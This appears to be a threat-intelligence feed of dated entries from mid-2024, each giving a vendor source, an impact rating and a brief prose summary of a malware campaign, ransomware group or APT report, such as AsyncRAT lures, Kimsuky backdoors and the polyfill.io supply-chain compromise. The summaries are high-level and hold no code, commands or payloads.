Intel Name:
AsyncRAT_Disguised_as_an_E_Book
Date of Scan:
2024-07-03
Impact:
LOW
Summary:
ASEC researchers have uncovered new instances of malware distribution disguised as e-books, using multiple sophisticated techniques to execute AsyncRAT. These malicious e-books contain various malicious components, including a fake LNK file, a text file with a hidden PowerShell script, a compressed file that looks like a video, and a real e-book. The LNK file runs commands to execute the PowerShell script, which hides the malware folder and runs another obfuscated script that scans for security software. Based on the results, the script then runs malware hidden in the fake video files. The campaign shows attackers continuing to find new ways to avoid detection and spread malware.
Source: https://asec.ahnlab.com/ko/67571/
2024-07-03
Phishing_Emails_from_Hacked_Router_Helpdesk
LOW
+
Intel Source:
BleepingComputer
Intel Name:
Phishing_Emails_from_Hacked_Router_Helpdesk
Date of Scan:
2024-07-03
Impact:
LOW
Summary:
Researchers from BleepingComputer have observed that the support portal of Mercku, a Canadian router manufacturer, was hacked. As a result, people who submit support tickets to Mercku are receiving phishing emails pretending to be from MetaMask.
Source: https://www.bleepingcomputer.com/news/security/router-makers-support-portal-hacked-replies-with-metamask-phishing/
2024-07-03
North_Korea_Linked_Konni_APT_Group
MEDIUM
+
Intel Source:
X (Twitter)
Intel Name:
North_Korea_Linked_Konni_APT_Group
Date of Scan:
2024-07-03
Impact:
MEDIUM
Summary:
The Konni APT group has been a cyber espionage group since at least 2014. It is believed to be based in North Korea and is known for targeting government agencies and organizations in South Korea and the United States.
Source: https://x.com/500mk500/status/1808452853356208469?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-07-03
A_Historical_Overview_of_SmokeLoader
LOW
+
Intel Source:
Zscaler
Intel Name:
A_Historical_Overview_of_SmokeLoader
Date of Scan:
2024-07-03
Impact:
LOW
Summary:
Zscaler ThreatLabz researchers have investigated the growth of SmokeLoader, a malware downloader that has been active since 2011. They also provided an overview of SmokeLoader's development from 2015 to 2022, during which time the malware updated its algorithms and improved its anti-analysis capabilities.
Source: https://www.zscaler.com/blogs/security-research/brief-history-smokeloader-part-2
2024-07-03
Malicious_LNK_Files_Have_Proliferated_Recently
LOW
+
Intel Source:
X (Twitter)
Intel Name:
Malicious_LNK_Files_Have_Proliferated_Recently
Date of Scan:
2024-07-03
Impact:
LOW
Summary:
Malicious LNK files have been identified by security researcher DOCGuard on X (Twitter). LNK files are based on the Shell Link Binary file format, also known as Windows shortcuts. What seems a relatively simple ability to execute other binaries on the system can inflict great harm when abused by threat actors.
Source: https://x.com/doc_guard/status/1808138663017975965
2024-07-02
Medusa_ransomware_group_attack
LOW
+
Intel Source:
ReliaQuest Threat Research
Intel Name:
Medusa_ransomware_group_attack
Date of Scan:
2024-07-02
Impact:
LOW
Summary:
Last month, ReliaQuest was notified of and responded to detections of a ransomware attack by the “Medusa” ransomware group that encrypted various hosts in a customer environment. The ReliaQuest Threat Research team investigated and found that Medusa utilized a compromised VPN account for initial access, NTDS dumps for credential access, and RDP for lateral movement.
Source: https://www.reliaquest.com/blog/medusa-attack-analysis/
2024-07-02
Coral_Raider_Kill_Chain
LOW
+
Intel Source:
Infoblox
Intel Name:
Coral_Raider_Kill_Chain
Date of Scan:
2024-07-02
Impact:
LOW
Summary:
Researchers at Infoblox have discovered a major cyber campaign run by Coral Raider. This campaign started in February 2024 and spreads different types of infostealer malware, such as Rhadamanthys, Lumma C2, and Cryptbot. In this campaign, Coral Raider employs a sophisticated tactic of using Content Delivery Networks (CDNs) to host malicious files and payloads, which hides their malicious activity from potential victims. CDNs are usually used to deliver content quickly, but in this case they help Coral Raider avoid detection and spread malware smoothly.
Source: https://blogs.infoblox.com/threat-intelligence/dns-early-detection-breaking-the-coral-raider-kill-chain/
2024-07-02
Diving_Deep_into_ShadowPad_Builder
LOW
+
Intel Source:
Nao_Sec
Intel Name:
Diving_Deep_into_ShadowPad_Builder
Date of Scan:
2024-07-02
Impact:
LOW
Summary:
Researchers at Nao_Sec have explored the ShadowPad malware builder, which had long been a mystery and allows sophisticated threat actors to customize and deploy ShadowPad (PlugX's successor). The post describes how attackers set up their malware, create payloads, prepare command-and-control infrastructure, and run campaigns, explaining the builder's operational intricacies.
Source: https://nao-sec.org/2024/06/building-caspers-shadow.html#fn:4
2024-07-02
AsyncRAT_ActiveIOCs
LOW
+
Intel Source:
Rewterz
Intel Name:
AsyncRAT_ActiveIOCs
Date of Scan:
2024-07-02
Impact:
LOW
Summary:
Researchers at Rewterz explore AsyncRAT, an open-source remote monitoring tool using encrypted connections that cybercriminals misuse for keylogging, remote access, and spreading malicious software. It infects systems by sending malicious files and transferring malicious programs to USB drives. Recent attacks, including those targeting Thailand Pass users and the Follina outbreak in Australia, have used AsyncRAT. It spreads through spear-phishing, malicious ads, and exploit kits, using encryption and obfuscation to avoid detection and updating itself with new features. To protect against AsyncRAT, keep software updated, use strong passwords, back up data, and use anti-malware software.
Source: https://www.rewterz.com/threat-advisory/asyncrat-active-iocs-4
2024-07-02
New_Orcinius_trojan
MEDIUM
+
Intel Source:
SonicWall
Intel Name:
New_Orcinius_trojan
Date of Scan:
2024-07-02
Impact:
MEDIUM
Summary:
The SonicWall Capture Labs threat research team recently discovered a new Orcinius Trojan that uses VBA stomping to mask its infection. The malware, disguised as an Italian calendar spreadsheet, contains an obfuscated VBA macro that monitors running windows and keystrokes, creating persistence using registry keys. It is suggested that the malware is associated with Remcos, AgentTesla, Neshta, and HTMLDropper, which masquerades as 'Synaptics.exe'.
Source: https://blog.sonicwall.com/en-us/2024/06/new-orcinius-trojan-uses-vba-stomping-to-mask-infection/
2024-07-02
Forked_Kematian_Stealer
LOW
+
Intel Source:
K7 Security Labs
Intel Name:
Forked_Kematian_Stealer
Date of Scan:
2024-07-02
Impact:
LOW
Summary:
Researchers from K7 Labs have uncovered Kematian Stealer, a PowerShell-based malware that developed from a PowerShell Token-Grabber. The C++ loader hides an obfuscated script that decrypts and runs a batch file with advanced privileges to execute the PowerShell script. This script checks for admin rights and creates persistence via the Windows Task Scheduler. It collects system and network information, such as public IP, UUID, MAC addresses, and username, storing this data in the temp directory. To evade detection, it removes files related to Discord Token Protector and attempts to download a payload, redirecting to the Kematian stealer GitHub page.
Source: https://labs.k7computing.com/
2024-07-02
Exposing_FakeBat_loader
MEDIUM
+
Intel Source:
Sekoia
Intel Name:
Exposing_FakeBat_loader
Date of Scan:
2024-07-02
Impact:
MEDIUM
Summary:
In the last couple of months, FakeBat has been one of the most widespread loaders using the drive-by download technique. Researchers discovered multiple FakeBat distribution campaigns leveraging malvertising, software impersonation, fake web browser updates, and social engineering schemes on social networks to trick users into downloading the malware. Analysts monitored the FakeBat C2 infrastructure and identified over 130 domain names associated with high confidence with FakeBat C2 servers since August 2023.
Source: https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/#h-iocs
2024-07-02
A_Deep_dive_into_the_Zergeca_botnet
LOW
+
Intel Source:
Qianxin
Intel Name:
A_Deep_dive_into_the_Zergeca_botnet
Date of Scan:
2024-07-02
Impact:
LOW
Summary:
The Zergeca botnet is a recently discovered malicious network that can support six different attack methods and has been designed to evade detection by antivirus software. The botnet primarily targets regions such as Canada, the United States, and Germany, and the main type of attack is ackFlood.
Source: https://blog.xlab.qianxin.com/a-deep-dive-into-the-zergeca-botnet/
2024-07-02
An_Overview_of_Sea_Turtle_APT_Group
MEDIUM
+
Intel Source:
Cyberthint
Intel Name:
An_Overview_of_Sea_Turtle_APT_Group
Date of Scan:
2024-07-02
Impact:
MEDIUM
Summary:
The operations of Sea Turtle, a prominent Turkish cyber espionage group known under many other names including Teal Kurma, Marbled Dust, SILICON and Cosmic Wolf, have been examined by Cyberthint researchers. The year 2017 marked the emergence of Sea Turtle in Europe, North Africa and the Middle East, where it targeted governments, terrorist groups, IT providers, ISPs, media and entertainment organisations, NGOs and telecommunications providers using DNS hijacking and other sophisticated tactics. Their interests also pertain to Turkey’s security and include traffic redirection and unauthorized access to critical infrastructure.
Source: https://cyberthint.io/sea-turtle-apt-group-analysis/
2024-07-02
New_ransomware_tracked_as_Volcano_Demon
LOW
+
Intel Source:
Halcyon
Intel Name:
New_ransomware_tracked_as_Volcano_Demon
Date of Scan:
2024-07-02
Impact:
LOW
Summary:
Halcyon has discovered a new ransomware group, tracked as Volcano Demon, which has carried out several attacks in the last couple of weeks. An encryptor sample dubbed LukaLocker was identified encrypting victim files with the .nba file extension. Volcano Demon succeeded in locking both Windows workstations and servers after using common administrative credentials harvested from the network.
Source: https://www.halcyon.ai/blog/halcyon-identifies-new-ransomware-operator-volcano-demon-serving-up-lukalocker
2024-07-02
Mining_Gang_new_malware
LOW
+
Intel Source:
Qianxin
Intel Name:
Mining_Gang_new_malware
Date of Scan:
2024-07-02
Impact:
LOW
Summary:
Qianxin describes the discovery and analysis of k4spreader, a new malware installer and spreader tool developed by the 8220 mining gang. k4spreader is written in cgo and implements system persistence, self-updating, and the release of other malware such as the Tsunami botnet and PwnRig miner. The tool is still in early development, with three versions observed so far.
Source: https://blog.xlab.qianxin.com/8220-k4spreader-new-tool-en/
2024-07-02
An_Open_Source_Stealer_Tool_Dubbed_Typez_Stealer
LOW
+
Intel Source:
ThreatMon
Intel Name:
An_Open_Source_Stealer_Tool_Dubbed_Typez_Stealer
Date of Scan:
2024-07-02
Impact:
LOW
Summary:
ThreatMon researchers have discovered a new open-source stealer tool named Typez Stealer, built in Python and available on GitHub. It includes features targeting Discord Nitro, billing, email, contact information, heidye codes, etc. It is also said to be capable of revealing information about the system.
Source: https://x.com/monthreat/status/1807701750234669197?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-07-01
RisePro_Information_Stealer
MEDIUM
+
Intel Source:
Blackberry
Intel Name:
RisePro_Information_Stealer
Date of Scan:
2024-07-01
Impact:
MEDIUM
Summary:
BlackBerry researchers have analyzed the malware called RisePro, a flexible malware available for purchase on underground forums. It became active in late 2023 and early 2024. This malware infects systems through malicious links and can be distributed by malware like PrivateLoader. RisePro connects to a C2 server to steal data such as browser details and cryptocurrency wallets. It is believed to be developed by Russian-speaking individuals and operates on a subscription basis, allowing customization of its features. RisePro often masquerades as legitimate software and has advanced capabilities to evade detection and maintain persistence on infected devices. Recent versions use a custom TCP protocol for communication. Organizations should implement proactive cybersecurity measures like continuous monitoring and robust endpoint security.
Source: https://blogs.blackberry.com/en/2024/06/threat-analysis-insight-risepro-information-stealer
2024-07-01
Russia_and_Iran_Targeting_French_Elections
MEDIUM
+
Intel Source:
Recorded Future
Intel Name:
Russia_and_Iran_Targeting_French_Elections
Date of Scan:
2024-07-01
Impact:
MEDIUM
Summary:
According to research by Insikt Group, Russian and Iranian influence networks are targeting the upcoming French elections, but their effect is now insignificant. While the CopyCop network employs artificial intelligence (AI) to spread pro-Russian narratives, the Russia-affiliated Doppelganger network uses social media bots and cloned websites to push pro-Russian content. Iran's minimal involvement is probably a reaction to France's support of Israel.
Source: https://go.recordedfuture.com/hubfs/reports/TA-2024-0628.pdf
2024-07-01
Lumma_Stealer_Malware_Active_IOCs
LOW
+
Intel Source:
Rewterz
Intel Name:
Lumma_Stealer_Malware_Active_IOCs
Date of Scan:
2024-07-01
Impact:
LOW
Summary:
Lumma Stealer, also known as LummaC, is an information stealer sold as Malware-as-a-Service (MaaS) on Russian-speaking underground forums and Telegram. Written in C, it efficiently accesses system resources to steal sensitive information, primarily targeting cryptocurrency wallets and related data such as private keys and wallet.dat files. It also has file-grabber capabilities. To protect against Lumma and similar threats, it is critical to update software, use strong passwords, enable multi-factor authentication, avoid suspicious links, and use reputable antivirus solutions.
Source: https://www.rewterz.com/threat-advisory/lumma-stealer-malware-aka-lummac-active-iocs-2
2024-07-01
Supply_Chain_Compromise
MEDIUM
+
Intel Source:
Rapid7
Intel Name:
Supply_Chain_Compromise
Date of Scan:
2024-07-01
Impact:
MEDIUM
Summary:
Rapid7 discovered that installers for Notezilla, RecentX, and Copywhiz hosted on conceptworld[.]com were trojanized to execute information-stealing malware. The malware can steal browser credentials, crypto wallet info, clipboard data, and keystrokes, as well as download additional payloads. Rapid7 disclosed the issue to Conceptworld, who promptly removed the malicious installers.
Source: https://www.rapid7.com/blog/post/2024/06/27/supply-chain-compromise-leads-to-trojanized-installers-for-notezilla-recentx-copywhiz/
2024-06-28
New_Lockbit_Ransom_Note
HIGH
+
Intel Source:
X (Twitter)
Intel Name:
New_Lockbit_Ransom_Note
Date of Scan:
2024-06-28
Impact:
HIGH
Summary:
Security researcher Dominic Alvieri identified the new Lockbit ransom note on X (Twitter). The note includes “Your files have been encrypted with Lockbit ransomware.” and provides an email address to contact.
Source: https://x.com/alvierid/status/1806134812157034720?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-06-28
Poseidon_Mac_Stealer_Spreading_via_Google_Ads
LOW
+
Intel Source:
Malwarebytes Labs
Intel Name:
Poseidon_Mac_Stealer_Spreading_via_Google_Ads
Date of Scan:
2024-06-28
Impact:
LOW
Summary:
Researchers at Malwarebytes Labs have discovered a fresh operation that uses malicious Google advertisements for the Arc browser to spread a stealer that targets Mac users. Arc has been utilized as a lure twice in the last several months, which is undoubtedly evidence of its popularity. Before, a Windows RAT was dropped using Google advertisements as well.
Source: https://www.malwarebytes.com/blog/news/2024/06/poseidon-mac-stealer-distributed-via-google-ads
2024-06-28
Analyzing_Water_Sigbin_Infection_Process
LOW
+
Intel Source:
Trend Micro
Intel Name:
Analyzing_Water_Sigbin_Infection_Process
Date of Scan:
2024-06-28
Impact:
LOW
Summary:
Trend Micro researchers have investigated the multi-stage loading technique that is employed to distribute the XMRig cryptocurrency miner and PureCrypter loader. In this campaign, all payloads use .NET Reactor, a .NET code protection tool, to hinder reverse engineering. The protection obfuscates the code, preventing defenders from understanding and reproducing it, and also includes anti-debugging methods.
Source: https://www.trendmicro.com/en_us/research/24/f/water-sigbin-xmrig.html
2024-06-28
New_Stealer_Tool_Named_Kematian_Stealer
LOW
+
Intel Source:
ThreatMon
Intel Name:
New_Stealer_Tool_Named_Kematian_Stealer
Date of Scan:
2024-06-28
Impact:
LOW
Summary:
ThreatMon researchers discovered an open-source stealing tool called Kematian Stealer, which is built in Python and posted on GitHub. This tool's wide range of capabilities presents serious concerns.
Source: https://x.com/monthreat/status/1806623709693624782?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-06-28
Kimsuky_Deploys_TRANSLATEXT_in_South_Korea
LOW
+
Intel Source:
Zscaler
Intel Name:
Kimsuky_Deploys_TRANSLATEXT_in_South_Korea
Date of Scan:
2024-06-28
Impact:
LOW
Summary:
Researchers from Zscaler ThreatLabz have observed new activity from Kimsuky, a North Korean government-backed hacker group. This group is targeting academic institutions in South Korea to gather intelligence. The researchers found that Kimsuky is using a new Google Chrome extension called "TRANSLATEXT" for cyber espionage. This extension is designed to steal email addresses, usernames, passwords, cookies, and take screenshots of the browser. It is important to be careful when installing programs from untrusted sources to stay safe and avoid potential security breaches.
Source: https://www.zscaler.com/blogs/security-research/kimsuky-deploys-translatext-target-south-korean-academia
2024-06-28
Unfurling_Hemlock_Hackers_Infecting_Systems
MEDIUM
+
Intel Source:
Outpost24
Intel Name:
Unfurling_Hemlock_Hackers_Infecting_Systems
Date of Scan:
2024-06-28
Impact:
MEDIUM
Summary:
Researchers at Outpost24 have disclosed a massive malware campaign that appears to be the work of the cyber threat group Unfurling Hemlock, believed to reside in Eastern Europe and to have orchestrated a large-scale malware campaign aimed at financial gain. The group uses complex distribution vectors, such as nested cabinet files and multiple payloads spread through loaders and emails across the globe, to deliver hundreds of thousands of malware samples. Its reliance on stealers and loaders suggests it is less focused on targeted attacks and instead prefers to infect as many systems as possible. The group's infrastructure and language artifacts point to direct links with well-established Eastern European cybercriminal networks, reflecting a disciplined, profit-driven business model for malware-based operations.
Source: https://outpost24.com/blog/unfurling-hemlock-cluster-bomb-campaign/
2024-06-28
The_Latrodectus_Infection_Is_Returning
LOW
+
Intel Source:
PaloAlto
Intel Name:
The_Latrodectus_Infection_Is_Returning
Date of Scan:
2024-06-28
Impact:
LOW
Summary:
Palo Alto researchers observed a Latrodectus infection using BackConnect and KeyholeVNC traffic. After going silent for a few weeks, Latrodectus has returned.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-06-25-IOCs-from-Latrodectus-activity.txt
2024-06-28
New_DLS_of_Blackbasta_Ransomware
MEDIUM
+
Intel Source:
X (Twitter)
Intel Name:
New_DLS_of_Blackbasta_Ransomware
Date of Scan:
2024-06-28
Impact:
MEDIUM
Summary:
A new DLS of Blackbasta ransomware has been identified by security researcher Rakesh Krishnan on X (Twitter). BlackBasta emerged in April 2022 and has already compromised over 200 organizations, thus representing one of the most threatening ransomware gangs in the cyber scene.
Source: https://x.com/rakeshkrish12/status/1806216139581669867?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-06-28
Analysis_of_HFS_Server_Attack
LOW
+
Intel Source:
ASEC
Intel Name:
Analysis_of_HFS_Server_Attack
Date of Scan:
2024-06-28
Impact:
LOW
Summary:
ASEC researchers have uncovered the exploitation of vulnerability CVE-2024-23692 in HFS (HTTP File Server) version 2.3m. Attackers infiltrate systems, gather information with commands like "whoami" and "arp," create hidden backdoor accounts, and install malware such as the XMRig coin miner. The attackers are believed to be part of a Chinese-speaking group, including four groups, one of which is the known group LemonDuck. Besides XMRig, they also use various RAT malware such as XenoRAT, Gh0stRAT, PlugX, CobaltStrike, and Netcat. Additionally, GoThief malware, which steals information using Amazon S3, has been identified. Users of HFS should update to the latest version to avoid these vulnerabilities.
Source: https://asec.ahnlab.com/ko/67509/
2024-06-28
Agent_Tesla_Malware_active_IOCs
MEDIUM
+
Intel Source:
Rewterz
Intel Name:
Agent_Tesla_Malware_active_IOCs
Date of Scan:
2024-06-28
Impact:
MEDIUM
Summary:
Rewterz researchers have uncovered the Trojan called Agent Tesla, a popular spyware active since 2014. It is known for stealing data from browsers, FTP clients, and other apps. Often spread via phishing emails, it can capture screenshots and clipboard data and access webcams. Agent Tesla can also disable antivirus programs and uses techniques to evade detection, such as checking for virtual machines, code obfuscation, and encrypting communications. It targets a wide range of victims, including individuals, small businesses, and large organizations across various sectors like finance, healthcare, and government, making it a global threat. Recently, a campaign used steganography to hide Agent Tesla in an EML file, which then executed malicious JavaScript and PowerShell commands.
Source: https://www.rewterz.com/threat-advisory/agent-tesla-malware-active-iocs-6
2024-06-27
Xctdoor_malware_targeting_domestic_companies
LOW
+
Intel Source:
ASEC
Intel Name:
Xctdoor_malware_targeting_domestic_companies
Date of Scan:
2024-06-27
Impact:
LOW
Summary:
ASEC researchers have recently discovered that attackers are exploiting a domestic ERP solution to carry out attacks. After breaching the system, they target the ERP update server to control company systems and attack vulnerable web servers to distribute malicious code, primarily affecting defense and manufacturing companies. The backdoor, called Xctdoor, developed in the Go language, can inject itself into various processes, persist through reboots, and communicate with C2 servers. This malware can steal information such as screenshots, keystrokes, and drive details.
Source: https://asec.ahnlab.com/ko/67034/
2024-06-27
Attackers_Exploit_Cobalt_Strike_Profiles
LOW
+
Intel Source:
PaloAlto
Intel Name:
Attackers_Exploit_Cobalt_Strike_Profiles
Date of Scan:
2024-06-27
Impact:
LOW
Summary:
Palo Alto researchers have uncovered new malicious uses of Cobalt Strike, a tool designed for cybersecurity testing but often misused by cybercriminals. In some instances attackers modify Malleable C2 profiles to conceal Cobalt Strike's traffic, making it difficult to detect. These profiles, originally shared on public repositories for legitimate purposes, are easily replicated and changed by attackers. Analysis of these profiles documents alterations in HTTP paths and User-Agent details, showing how attackers modify them to avoid detection. The evolving tactics of attackers pose a challenge for traditional network security because of the variety of profile variations.
Source: https://unit42.paloaltonetworks.com/attackers-exploit-public-cobalt-strike-profiles/
2024-06-27
Kimsuky_New_Backdoor_is_HappyDoor
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Kimsuky_New_Backdoor_is_HappyDoor
Date of Scan:
2024-06-27
Impact:
MEDIUM
Summary:
Researchers at ASEC have identified that the Kimsuky group, a recognized North Korean threat actor, has been employing the HappyDoor malware in their cyber-attacks since 2021. This group distributes the HappyDoor malware via spear phishing emails containing Jscript or executable file attachments, which also execute a decoy file. The malware is equipped with capabilities for information theft, screen capture, and device information collection. It encrypts stolen data before transmitting it to a C2 server via HTTP. The malware undergoes regular updates and utilizes encrypted packets for communication. Kimsuky frequently employs social engineering tactics to deceive victims into executing malicious attachments, enabling HappyDoor to install additional malware for remote control and data exfiltration.
Source: https://asec.ahnlab.com/ko/67128/
2024-06-27
Malware_Innovation_in_InnoSetup
LOW
+
Intel Source:
ASEC
Intel Name:
Malware_Innovation_in_InnoSetup
Date of Scan:
2024-06-27
Impact:
LOW
Summary:
Researchers from ASEC have observed a new type of malware that is disguised as cracks and commercial tools. Unlike past malware, which performed malicious behaviors immediately upon being executed, this malware presents an installer UI and activates its harmful actions when the user interacts with buttons during the installation process. It appears that when a user requests a download, a unique piece of malware is generated and delivered instantly, rather than distributing pre-made malware. As a result, each download produces malware with a distinct hash value but the same functionality.
Source: https://asec.ahnlab.com/en/67502/
2024-06-27
DBatLoader_Spreading_via_CMD_Files
LOW
+
Intel Name:
DBatLoader_Spreading_via_CMD_Files
Date of Scan:
2024-06-27
Impact:
LOW
Summary:
Researchers from ASEC have discovered a new distribution method for DBatLoader (ModiLoader) malware using CMD files. Initially spread through phishing emails in RAR format containing EXE files, DBatLoader now uses UTF-16LE encoding to hide its code. Once decoded, it is revealed to be an EXE file compiled in Delphi, capable of loading DLLs, fetching external data, and executing decoded payloads, increasing its threat potential.
Source: https://asec.ahnlab.com/en/67468/
2024-06-27
Polyfill_supply_chain_attack
LOW
+
Intel Source:
Sansec Forensics
Intel Name:
Polyfill_supply_chain_attack
Date of Scan:
2024-06-27
Impact:
LOW
Summary:
A malicious Chinese entity acquired control over the popular Polyfill JS open-source project and has been injecting malware into over 100,000 websites that embed the polyfill.io content delivery network. The malware redirects mobile users to a fraudulent sports betting site hosted on a domain impersonating Google Analytics. The attack employs various evasion techniques and targets specific devices and time windows. While trustworthy alternatives are available, it's recommended to remove any references to polyfill.io from your codebase as the library is no longer necessary for modern browsers.
Source: https://sansec.io/research/polyfill-supply-chain-attack
2024-06-27
MerkSpy_Exploitation_of_CVE_2021_40444
LOW
+
Intel Source:
Fortinet
Intel Name:
MerkSpy_Exploitation_of_CVE_2021_40444
Date of Scan:
2024-06-27
Impact:
LOW
Summary:
FortiGuard Researchers have discovered an attack exploiting the CVE-2021-40444 vulnerability in Microsoft Office. This allows attackers to run malicious code through specially crafted documents. The attack led to the deployment of "MerkSpy," which secretly monitors activities, steals information, and starts automatically by disguising itself as a legitimate update. The attack begins with a fake job description in a Microsoft Word document. Opening the document triggers the CVE-2021-40444 exploitation, a remote code execution vulnerability within the MSHTML component used by Internet Explorer in Microsoft Office.
Source: https://www.fortinet.com/blog/threat-research/merkspy-exploiting-cve-2021-40444-to-infiltrate-systems
2024-06-27
Malicious_NPM_Package_Aiming_at_Amazon_Users
MEDIUM
+
Intel Source:
ReversingLabs
Intel Name:
Malicious_NPM_Package_Aiming_at_Amazon_Users
Date of Scan:
2024-06-27
Impact:
MEDIUM
Summary:
Researchers at ReversingLabs have identified that the threat of malicious packages in open source repositories like npm and PyPI is on the rise. The post reports on situations where supposedly innocuous software packages were actually hiding malicious scripts or installing nefarious payloads upon installation. As much as maintainers try to keep an eye on and be delicate in what they build, the sheer size of the open source world makes it hard.
Source: https://www.reversinglabs.com/blog/a-lurking-npm-package-makes-the-case-for-open-source-health-checks
2024-06-27
The_Infostealer_0bj3ctivity_is_Operational_Again
LOW
+
Intel Source:
CERT-AGID
Intel Name:
The_Infostealer_0bj3ctivity_is_Operational_Again
Date of Scan:
2024-06-27
Impact:
LOW
Summary:
CERT-AGID researchers have observed that a campaign spreading the 0bj3ctivity infostealer (a.k.a. PXRECVOWEIWOEI stealer) in Italy, which employs advanced techniques with a tinge of English-language content, has just resurfaced. The attack starts with emails that include a Discord URL and an obfuscated image, and now uses JavaScript in place of VBS files. This results in PowerShell downloading a steganographed .NET file in the second stage, which is used to drop and execute the infostealer. The stolen data, which includes information about the compromised machine as well as credentials for the most common FTP, instant messaging, and email clients, is saved as text files, compacted into a single ZIP package, and delivered to the C2 via email or Telegram.
Source: https://cert-agid.gov.it/news/linfostealer-0bj3ctivity-e-tornato-in-azione/
2024-06-26
Noodle_RAT_Naked_Network_Traffic
LOW
+
Intel Source:
X (Twitter)
Intel Name:
Noodle_RAT_Naked_Network_Traffic
Date of Scan:
2024-06-26
Impact:
LOW
Summary:
Security researcher Ksenia identified the Noodle RAT naked network traffic on X (Twitter). Noodle RAT, also known as ANGRYREBEL and Nood RAT, has been associated with Chinese-speaking espionage groups since at least July 2016. Initially mistaken for variants of Gh0st RAT and Rekoobe, it has only recently been recognized as a distinct type of malware.
Source: https://x.com/naumovax/status/1803788216924877090?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-06-26
Quasar_RAT_aka_CinaRAT
LOW
+
Intel Source:
Rewterz
Intel Name:
Quasar_RAT_aka_CinaRAT
Date of Scan:
2024-06-26
Impact:
LOW
Summary:
Rewterz researchers have identified new activity of Quasar RAT, malicious software first discovered in 2015 that is abused by cybercriminals to take control of a victim's machine. It is usually spread through phishing emails or deceptive tactics, tricking users into clicking malicious links or downloading infected files. Once installed, it can view and manipulate files, record keystrokes, steal login information, take screenshots, and access the victim's webcam and microphone. It can also install other malware and use the infected systems to attack other targets.
Source: https://www.rewterz.com/threat-advisory/quasar-rat-aka-cinarat-active-iocs-3
2024-06-26
The_details_a_Russian_TA_attacking_Ukraine
MEDIUM
+
Intel Source:
Strike Ready Labs
Intel Name:
The_details_a_Russian_TA_attacking_Ukraine
Date of Scan:
2024-06-26
Impact:
MEDIUM
Summary:
Strike Ready Labs researchers shared their report with the details of a Russia-linked threat actor targeting Ukraine, employing various obfuscation techniques. The malicious activity involves dropping a compressed file disguised as a RAR archive, which fetches a remote image likely used for tracking execution. The payload employs mshta.exe to execute remote content and leverages LNK files with crafted filenames. The techniques suggest an effort to evade detection and hamper analysis.
Source: https://blog.strikeready.com/blog/armageddon-is-more-than-a-grammy-nominated-album/
2024-06-26
A_detailed_investigation_of_the_phishing_campaign
LOW
+
Intel Source:
Any.Run
Intel Name:
A_detailed_investigation_of_the_phishing_campaign
Date of Scan:
2024-06-26
Impact:
LOW
Summary:
Any.Run researchers ran a detailed investigation of the phishing campaign encountered by the company. The researchers found around 72 phishing domains impersonating real or fictitious companies. These domains hosted believable websites that tricked people into sharing their login details. The attack was sophisticated, using advanced techniques such as direct human interaction to deceive targets.
Source: https://any.run/cybersecurity-blog/analysis-of-the-phishing-campaign/
2024-06-26
A_Suspected_Chinese_APT_Group_Named_ChamelGang
MEDIUM
+
Intel Source:
Sentinel Labs
Intel Name:
A_Suspected_Chinese_APT_Group_Named_ChamelGang
Date of Scan:
2024-06-26
Impact:
MEDIUM
Summary:
Researchers from SentinelLabs, who recently collaborated with Recorded Future, have observed and reported two separate threat groups that specialized in attacking the government and critical infrastructure sectors around the world between 2021 and 2023. One of these clusters has been linked to the Chinese APT group ChamelGang (a.k.a. CamoFei). The second cluster is similar to previous attacks attributed to suspected Chinese and North Korean APT groups, whereas the first one stands out from the usual modus operandi of those teams. Most actions within the activities of these clusters include launching ransomware or data encryption tools, indicating a major risk to organizational data security and operational continuity across industry sectors.
Source: https://assets.sentinelone.com/sentinellabs/chamelgang-friends-en
2024-06-26
Malware_Concealed_Behind_Cloud_Services
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Malware_Concealed_Behind_Cloud_Services
Date of Scan:
2024-06-26
Impact:
MEDIUM
Summary:
FortiGuard researchers have identified botnets that use cloud services to increase their malicious activities. Botnets like UNSTABLE and Condi are spreading malware through cloud storage and computing services, making it difficult to disrupt their operations. The UNSTABLE Botnet, a Mirai variant, exploits vulnerabilities in various devices like JAWS webservers and TP-Link routers, using brute-force techniques and DDoS attacks. Similarly, the Condi Botnet exploits vulnerabilities to gain device control and establish connections to its command server. An analysis showed that these botnets use sophisticated methods to avoid detection and keep their operations running smoothly.
Source: https://www.fortinet.com/blog/threat-research/growing-threat-of-malware-concealed-behind-cloud-services
2024-06-26
BrainCipher_Ransomware
MEDIUM
+
Intel Source:
X (Twitter)
Intel Name:
BrainCipher_Ransomware
Date of Scan:
2024-06-26
Impact:
MEDIUM
Summary:
A new ransomware known as BrainCipher has been identified by security researcher Gameel Ali on X (Twitter). Furthermore, the threat actors behind the BrainCipher ransomware used a leaked Lockbit builder to develop it.
Source: https://x.com/malgamy12/status/1805884150399770871?s=12&t=8PuF3QXqo9azqMLbBfcyeA
2024-06-25
P2PInfect_Botnet_Aimed_at_REdis_Servers
LOW
+
Intel Source:
Cado Security
Intel Name:
P2PInfect_Botnet_Aimed_at_REdis_Servers
Date of Scan:
2024-06-25
Impact:
LOW
Summary:
A new P2PInfect update has been found containing a ransomware and crypto miner payload. Cado Security, which has been tracking P2PInfect for some time, says it has evidence that P2PInfect is a type of botnet for hire, but contradictions among the data available to researchers mean they cannot definitively say so at this point. After the malware was examined, it was found to leverage Redis replication functionality to spread.
Source: https://www.cadosecurity.com/blog/from-dormant-to-dangerous-p2pinfect-evolves-to-deploy-new-ransomware-and-cryptominer
2024-06-25
Hunting_for_configuration_files
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Hunting_for_configuration_files
Date of Scan:
2024-06-25
Impact:
LOW
Summary:
The ISC.SANS researcher Johannes Ullrich noticed in their "First Seen URL" list a new variation that appears to target Java Spring configuration files.
Source: https://isc.sans.edu/diary/Configuration+Scanners+Adding+Java+Specific+Configuration+Files/31032/
2024-06-25
A_surge_in_JavaScript_spreading_StrelaStealer
LOW
+
Intel Source:
Sonicwall
Intel Name:
A_surge_in_JavaScript_spreading_StrelaStealer
Date of Scan:
2024-06-25
Impact:
LOW
Summary:
